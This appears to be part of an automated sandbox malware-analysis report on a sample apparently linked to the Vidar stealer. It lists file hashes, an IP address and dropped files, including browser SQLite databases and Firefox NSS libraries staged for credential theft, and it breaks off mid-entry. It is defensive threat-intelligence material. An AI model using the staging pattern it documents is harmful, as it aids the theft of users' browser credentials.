                                      SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1316618.2567.8320.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\ProgramData\HJJJECFIECBG\freebl3.dllfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                            jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse
                                                file.exeGet hashmaliciousVidarBrowse
                                                  SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                    SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                        file.exeGet hashmaliciousVidarBrowse
                                                          C:\ProgramData\HJJJECFIECBG\mozglue.dllfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                            file.exeGet hashmaliciousVidarBrowse
                                                              CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                                jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                        SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                          BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                            file.exeGet hashmaliciousVidarBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\HJJJECFIECBG\AKECBF

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\BFCFBF

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                              Category:dropped
                                                                              Size (bytes):159744
                                                                              Entropy (8bit):0.7873599747470391
                                                                              Encrypted:false
                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\CBKJJE

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\EBGCFB

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                              Category:dropped
                                                                              Size (bytes):28672
                                                                              Entropy (8bit):2.5793180405395284
                                                                              Encrypted:false
                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\EHDGCG

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):126976
                                                                              Entropy (8bit):0.47147045728725767
                                                                              Encrypted:false
                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\GIEHJD

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\GIEHJD-shm

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\HCFIII

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9571
                                                                              Entropy (8bit):5.536643647658967
                                                                              Encrypted:false
                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                              Malicious:false
                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                              C:\ProgramData\HJJJECFIECBG\IDHIDB

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\JKEGDH

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):5242880
                                                                              Entropy (8bit):0.037963276276857943
                                                                              Encrypted:false
                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\JKEGDH-shm

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\KKEHIE

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\freebl3.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                                              • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                              • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\mozglue.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                                              • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                              • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\msvcp140.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\nss3.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\softokn3.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\HJJJECFIECBG\vcruntime140.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_F441.exe_d344ba73f4609dd422b4db8860abf6e38825755_836b94ca_b374aa5a-abc7-4013-9dc4-d7a423473300\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.9889980729271008
                                                                              Encrypted:false
                                                                              SSDEEP:96:elGQyqrsyhqnFI7qnIfqBQXIDcQRc6ecEIcw3vAC+HbHg/8BRTf32rLOyKZzTvS9:CfrCNM0vayOjvPFPzuiFxZ24IO8d
                                                                              MD5:77E823235AEF409E7E2972F7C0EE5BA7
                                                                              SHA1:20489196181EAD2610E9C796F7BC77ED24472319
                                                                              SHA-256:B74D235F91E0C50797CC052DCD886E77AC40490D59344869DDBABCBF1A813DDA
